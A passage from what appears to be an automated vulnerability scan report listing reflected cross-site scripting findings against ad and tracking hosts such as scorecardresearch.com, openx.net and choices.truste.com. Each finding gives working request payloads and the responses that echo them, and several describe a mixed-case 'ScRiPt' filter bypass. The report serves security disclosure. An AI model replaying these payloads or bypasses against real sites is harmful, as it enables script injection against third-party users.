Expires: Mon, 16 May 2011 14:00:51 GMT
Date: Mon, 09 May 2011 14:00:51 GMT
Connection: close
Content-Length: 1235

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888ee3b1<script>alert(1)</script>a730d899c17", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



3.34. http://b.scorecardresearch.com/beacon.js [c3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload febf6<script>alert(1)</script>b19c58ceea3 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2febf6<script>alert(1)</script>b19c58ceea3&c4=&c5=&c6=&c15=&tm=669483 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 16 May 2011 14:00:52 GMT
Date: Mon, 09 May 2011 14:00:52 GMT
Connection: close
Content-Length: 1235

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
y{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2febf6<script>alert(1)</script>b19c58ceea3", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



3.35. http://b.scorecardresearch.com/beacon.js [c4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload ea8f6<script>alert(1)</script>102f2c0a45 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=ea8f6<script>alert(1)</script>102f2c0a45&c5=&c6=&c15=&tm=669483 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 16 May 2011 14:00:52 GMT
Date: Mon, 09 May 2011 14:00:52 GMT
Connection: close
Content-Length: 1234

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"ea8f6<script>alert(1)</script>102f2c0a45", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



3.36. http://b.scorecardresearch.com/beacon.js [c5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 6f7ba<script>alert(1)</script>eda40b8879f was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=6f7ba<script>alert(1)</script>eda40b8879f&c6=&c15=&tm=669483 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 16 May 2011 14:00:52 GMT
Date: Mon, 09 May 2011 14:00:52 GMT
Connection: close
Content-Length: 1235

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"6f7ba<script>alert(1)</script>eda40b8879f", c6:"", c10:"", c15:"", c16:"", r:""});



3.37. http://b.scorecardresearch.com/beacon.js [c6 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 7e18e<script>alert(1)</script>03378f6c3ff was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=7e18e<script>alert(1)</script>03378f6c3ff&c15=&tm=669483 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 16 May 2011 14:00:52 GMT
Date: Mon, 09 May 2011 14:00:52 GMT
Connection: close
Content-Length: 1235

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"", c6:"7e18e<script>alert(1)</script>03378f6c3ff", c10:"", c15:"", c16:"", r:""});



3.38. http://bid.openx.net/json [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bid.openx.net
Path:   /json

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 92868<script>alert(1)</script>ee1fafea211 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /json?c=OXM_2758334807592868<script>alert(1)</script>ee1fafea211&pid=dd81ea27-d6ee-482c-a1ae-66747444994b&s=468x60&f=0.6&cid=oxpv1%3A72-1331-4020-944-2650&hrid=02eea6ce6a94fccf845961f4c7a8855c-1304949600&url=http%3A%2F%2Fwww.orlandosentinel.com%2Fbusiness%2Fos-cfb-cover-casey-tv-20110509%2C0%2C6839926.story HTTP/1.1
Host: bid.openx.net
Proxy-Connection: keep-alive
Referer: http://www.surphace.com/ads/rubicon_orlandosentinel
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i=02dd71c0-6aac-4019-82e3-049e51d96c25; p=1304805364

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Cache-Control: no-cache, must-revalidate
P3P: CP="CUR ADM OUR NOR STA NID"
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: s=2790e8cf-579c-4f5e-bf61-6238ae1e9422; version=1; path=/; domain=.openx.net;
Set-Cookie: p=1304949605; version=1; path=/; domain=.openx.net; max-age=63072000;

OXM_2758334807592868<script>alert(1)</script>ee1fafea211({"r":null});

3.39. http://choices.truste.com/ca [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 982fc<script>alert(1)</script>61b53c30a60 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl728x90&c=att02cont3982fc<script>alert(1)</script>61b53c30a60&w=728&h=90&ox=20&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/COM/iview/286738708/direct;wi.728;hi.90/01?click=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F2%2C13%253B543fcfdf7fc5a5a2%253B12fd50f27eb%2C0%253B%253B%253B2045613379%2CqgEAAAaQGwAUf3sAAAAAAKfzHgAAAAAAAgEAAAYAAAAAAP8AAAACCo0ELQAAAAAAdgMpAAAAAABEySgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADnlhEAAAAAAAIAAwAAAAAA6icP1S8BAAAAAAAAAGIyNTgwZDA2LTdhNDQtMTFlMC1iM2UxLWNmYTM2ZmYyM2UwNwBEiQEAAAA%3D%2C%2Chttp%253A%252F%252Fwww%2Efloridatoday%2Ecom%252Farticle%252F20110508%252Fnews01%252F105080319%252Fhighly%2Dpublicized%2Dmurder%2Dcaylee%2Danthony%2Drivets%2Denrages%2C$http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D13049496301806342-86546%26campID%3D64375%26crID%3D86546%26pubICode%3D2687862%26pub%3D347615%26partnerID%3D64%26url%3Dhttp%3A%2F%2Fwww%2Efloridatoday%2Ecom%2Farticle%2F20110508%2Fnews01%2F105080319%2Fhighly%2Dpublicized%2Dmurder%2Dcaylee%2Danthony%2Drivets%2Denrages%26redirectURL%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:10 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Vary: Accept-Encoding
Content-Type: text/javascript
Content-Length: 5150

if (typeof truste == "undefined" || !truste) {    var truste= {};    truste.ca= {};    truste.ca.listeners = {};    truste.img = new Image(1,1);    truste.defjsload = false;        truste.ts = null; //initi
...[SNIP]...
baseName] = bindings;    }}    // prototypes    String.prototype.equalsIgnoreCase = function(arg) {        return (new String(this.toLowerCase()) == (new String(arg)).toLowerCase());    }    var te_clr1_att02cont3982fc<script>alert(1)</script>61b53c30a60_ib = '<div id="te-clr1-att02cont3982fc<script>
...[SNIP]...

3.40. http://choices.truste.com/ca [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload cab56<ScRiPt>alert(1)</ScRiPt>f72a5ea7915 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl728x90cab56<ScRiPt>alert(1)</ScRiPt>f72a5ea7915&c=att02cont3&w=728&h=90&ox=20&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/COM/iview/286738708/direct;wi.728;hi.90/01?click=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F2%2C13%253B543fcfdf7fc5a5a2%253B12fd50f27eb%2C0%253B%253B%253B2045613379%2CqgEAAAaQGwAUf3sAAAAAAKfzHgAAAAAAAgEAAAYAAAAAAP8AAAACCo0ELQAAAAAAdgMpAAAAAABEySgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADnlhEAAAAAAAIAAwAAAAAA6icP1S8BAAAAAAAAAGIyNTgwZDA2LTdhNDQtMTFlMC1iM2UxLWNmYTM2ZmYyM2UwNwBEiQEAAAA%3D%2C%2Chttp%253A%252F%252Fwww%2Efloridatoday%2Ecom%252Farticle%252F20110508%252Fnews01%252F105080319%252Fhighly%2Dpublicized%2Dmurder%2Dcaylee%2Danthony%2Drivets%2Denrages%2C$http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D13049496301806342-86546%26campID%3D64375%26crID%3D86546%26pubICode%3D2687862%26pub%3D347615%26partnerID%3D64%26url%3Dhttp%3A%2F%2Fwww%2Efloridatoday%2Ecom%2Farticle%2F20110508%2Fnews01%2F105080319%2Fhighly%2Dpublicized%2Dmurder%2Dcaylee%2Danthony%2Drivets%2Denrages%26redirectURL%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:04 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Vary: Accept-Encoding
Content-Type: text/javascript
Content-Length: 3841

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.listeners={};truste.img=new Image(1,1);
truste.defjsload=false;truste.ts=null;truste.seq="0";truste.ca.txl={object:[{":widt
...[SNIP]...
_att02cont3_bi)",icon:"http://choices.truste.com/assets/admarker.png",icon_cam:"http://choices.truste.com/assets/adicon.png",iconText:"",aid:"att02",pid:"mec01",zindex:"10002",cam:"2",cid:"0311wl728x90cab56<ScRiPt>alert(1)</ScRiPt>f72a5ea7915"};
var tecabaseurl="http://choices.truste.com/";truste.ca.addEvent(window,"load",function(){var a=te_clr1_att02cont3_bi;
if(!truste.defjsload){var c=document.createElement("script");c.src="http://choi
...[SNIP]...

3.41. http://choices.truste.com/ca [iplc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the iplc request parameter is copied into the HTML document as plain text between tags. The payload a034b<ScRiPt>alert(1)</ScRiPt>9291441402 was submitted in the iplc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl728x90&c=att02cont3&w=728&h=90&ox=20&zi=10002&plc=tr&iplc=ctra034b<ScRiPt>alert(1)</ScRiPt>9291441402 HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/COM/iview/286738708/direct;wi.728;hi.90/01?click=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F2%2C13%253B543fcfdf7fc5a5a2%253B12fd50f27eb%2C0%253B%253B%253B2045613379%2CqgEAAAaQGwAUf3sAAAAAAKfzHgAAAAAAAgEAAAYAAAAAAP8AAAACCo0ELQAAAAAAdgMpAAAAAABEySgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADnlhEAAAAAAAIAAwAAAAAA6icP1S8BAAAAAAAAAGIyNTgwZDA2LTdhNDQtMTFlMC1iM2UxLWNmYTM2ZmYyM2UwNwBEiQEAAAA%3D%2C%2Chttp%253A%252F%252Fwww%2Efloridatoday%2Ecom%252Farticle%252F20110508%252Fnews01%252F105080319%252Fhighly%2Dpublicized%2Dmurder%2Dcaylee%2Danthony%2Drivets%2Denrages%2C$http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D13049496301806342-86546%26campID%3D64375%26crID%3D86546%26pubICode%3D2687862%26pub%3D347615%26partnerID%3D64%26url%3Dhttp%3A%2F%2Fwww%2Efloridatoday%2Ecom%2Farticle%2F20110508%2Fnews01%2F105080319%2Fhighly%2Dpublicized%2Dmurder%2Dcaylee%2Danthony%2Drivets%2Denrages%26redirectURL%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:28 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Vary: Accept-Encoding
Content-Type: text/javascript
Content-Length: 3839

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.listeners={};truste.img=new Image(1,1);
truste.defjsload=false;truste.ts=null;truste.seq="0";truste.ca.txl={object:[{":widt
...[SNIP]...
</div>\n';
var te_clr1_att02cont3_bi={baseName:"te-clr1-att02cont3",anchName:"te-clr1-att02cont3-anch",width:728,height:90,ox:20,oy:0,plc:"tr",iplc:"ctra034b<ScRiPt>alert(1)</ScRiPt>9291441402",intDivName:"te-clr1-att02cont3-itl",iconSpanId:"te-clr1-att02cont3-icon",backgroundColor:"white",opacity:0.8,filterOpacity:80,containerId:"att02cont3",noticeBaseUrl:"/camsg?",irBaseUrl:"/cair?",inter
...[SNIP]...

3.42. http://choices.truste.com/ca [js parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the js request parameter is copied into the HTML document as plain text between tags. The payload e3c58<ScRiPt>alert(1)</ScRiPt>bd57808141b was submitted in the js parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl728x90&c=att02cont3&w=728&h=90&ox=20&zi=10002&plc=tr&iplc=ctr&js=2e3c58<ScRiPt>alert(1)</ScRiPt>bd57808141b HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/COM/iview/286738708/direct;wi.728;hi.90/01?click=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F2%2C13%253B543fcfdf7fc5a5a2%253B12fd50f27eb%2C0%253B%253B%253B2045613379%2CqgEAAAaQGwAUf3sAAAAAAKfzHgAAAAAAAgEAAAYAAAAAAP8AAAACCo0ELQAAAAAAdgMpAAAAAABEySgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADnlhEAAAAAAAIAAwAAAAAA6icP1S8BAAAAAAAAAGIyNTgwZDA2LTdhNDQtMTFlMC1iM2UxLWNmYTM2ZmYyM2UwNwBEiQEAAAA%3D%2C%2Chttp%253A%252F%252Fwww%2Efloridatoday%2Ecom%252Farticle%252F20110508%252Fnews01%252F105080319%252Fhighly%2Dpublicized%2Dmurder%2Dcaylee%2Danthony%2Drivets%2Denrages%2C$http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D13049496301806342-86546%26campID%3D64375%26crID%3D86546%26pubICode%3D2687862%26pub%3D347615%26partnerID%3D64%26url%3Dhttp%3A%2F%2Fwww%2Efloridatoday%2Ecom%2Farticle%2F20110508%2Fnews01%2F105080319%2Fhighly%2Dpublicized%2Dmurder%2Dcaylee%2Danthony%2Drivets%2Denrages%26redirectURL%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:12 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Vary: Accept-Encoding
Content-Type: text/javascript
Content-Length: 3805

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.listeners={};truste.img=new Image(1,1);
truste.defjsload=false;truste.ts=null;truste.seq="0";truste.ca.txl={object:[{":widt
...[SNIP]...
nt3_bi;
if(!truste.defjsload){var c=document.createElement("script");c.src="http://choices.truste.com/ca?pid=mec01&aid=att02&cid=0311wl728x90&c=att02cont3&w=728&h=90&ox=20&zi=10002&plc=tr&iplc=ctr&js=2e3c58<ScRiPt>alert(1)</ScRiPt>bd57808141b&js=2";
document.body.appendChild(c);truste.defjsload=true}truste.ca.addBinding(te_clr1_att02cont3_bi)});

3.43. http://choices.truste.com/ca [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3114a<ScRiPt>alert(1)</ScRiPt>ef8ccd7b20f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl728x90&c=att02cont3&w=728&h=90&ox=20&zi=10002&plc=tr&iplc=ctr&3114a<ScRiPt>alert(1)</ScRiPt>ef8ccd7b20f=1 HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/COM/iview/286738708/direct;wi.728;hi.90/01?click=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F2%2C13%253B543fcfdf7fc5a5a2%253B12fd50f27eb%2C0%253B%253B%253B2045613379%2CqgEAAAaQGwAUf3sAAAAAAKfzHgAAAAAAAgEAAAYAAAAAAP8AAAACCo0ELQAAAAAAdgMpAAAAAABEySgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADnlhEAAAAAAAIAAwAAAAAA6icP1S8BAAAAAAAAAGIyNTgwZDA2LTdhNDQtMTFlMC1iM2UxLWNmYTM2ZmYyM2UwNwBEiQEAAAA%3D%2C%2Chttp%253A%252F%252Fwww%2Efloridatoday%2Ecom%252Farticle%252F20110508%252Fnews01%252F105080319%252Fhighly%2Dpublicized%2Dmurder%2Dcaylee%2Danthony%2Drivets%2Denrages%2C$http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D13049496301806342-86546%26campID%3D64375%26crID%3D86546%26pubICode%3D2687862%26pub%3D347615%26partnerID%3D64%26url%3Dhttp%3A%2F%2Fwww%2Efloridatoday%2Ecom%2Farticle%2F20110508%2Fnews01%2F105080319%2Fhighly%2Dpublicized%2Dmurder%2Dcaylee%2Danthony%2Drivets%2Denrages%26redirectURL%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:02:06 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Vary: Accept-Encoding
Content-Type: text/javascript
Content-Length: 3803

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.listeners={};truste.img=new Image(1,1);
truste.defjsload=false;truste.ts=null;truste.seq="0";truste.ca.txl={object:[{":widt
...[SNIP]...
02cont3_bi;
if(!truste.defjsload){var c=document.createElement("script");c.src="http://choices.truste.com/ca?pid=mec01&aid=att02&cid=0311wl728x90&c=att02cont3&w=728&h=90&ox=20&zi=10002&plc=tr&iplc=ctr&3114a<ScRiPt>alert(1)</ScRiPt>ef8ccd7b20f=1&js=2";
document.body.appendChild(c);truste.defjsload=true}truste.ca.addBinding(te_clr1_att02cont3_bi)});

3.44. http://choices.truste.com/ca [ox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the ox request parameter is copied into the HTML document as plain text between tags. The payload a5e47<script>alert(1)</script>27256ed0b74 was submitted in the ox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl728x90&c=att02cont3&w=728&h=90&ox=20a5e47<script>alert(1)</script>27256ed0b74&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/COM/iview/286738708/direct;wi.728;hi.90/01?click=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F2%2C13%253B543fcfdf7fc5a5a2%253B12fd50f27eb%2C0%253B%253B%253B2045613379%2CqgEAAAaQGwAUf3sAAAAAAKfzHgAAAAAAAgEAAAYAAAAAAP8AAAACCo0ELQAAAAAAdgMpAAAAAABEySgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADnlhEAAAAAAAIAAwAAAAAA6icP1S8BAAAAAAAAAGIyNTgwZDA2LTdhNDQtMTFlMC1iM2UxLWNmYTM2ZmYyM2UwNwBEiQEAAAA%3D%2C%2Chttp%253A%252F%252Fwww%2Efloridatoday%2Ecom%252Farticle%252F20110508%252Fnews01%252F105080319%252Fhighly%2Dpublicized%2Dmurder%2Dcaylee%2Danthony%2Drivets%2Denrages%2C$http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D13049496301806342-86546%26campID%3D64375%26crID%3D86546%26pubICode%3D2687862%26pub%3D347615%26partnerID%3D64%26url%3Dhttp%3A%2F%2Fwww%2Efloridatoday%2Ecom%2Farticle%2F20110508%2Fnews01%2F105080319%2Fhighly%2Dpublicized%2Dmurder%2Dcaylee%2Danthony%2Drivets%2Denrages%26redirectURL%3D
